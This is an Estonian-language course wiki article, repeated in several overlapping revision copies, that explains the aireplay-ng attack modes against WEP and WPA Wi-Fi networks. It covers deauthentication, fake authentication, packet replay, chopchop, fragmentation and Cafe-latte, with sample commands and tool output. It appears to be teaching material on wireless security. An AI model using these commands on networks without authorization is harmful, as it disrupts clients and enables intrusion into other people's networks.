Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:36:13Z

Tliiv: /* Broadcast */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:36:08Z

Tliiv: /* Suunatud */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

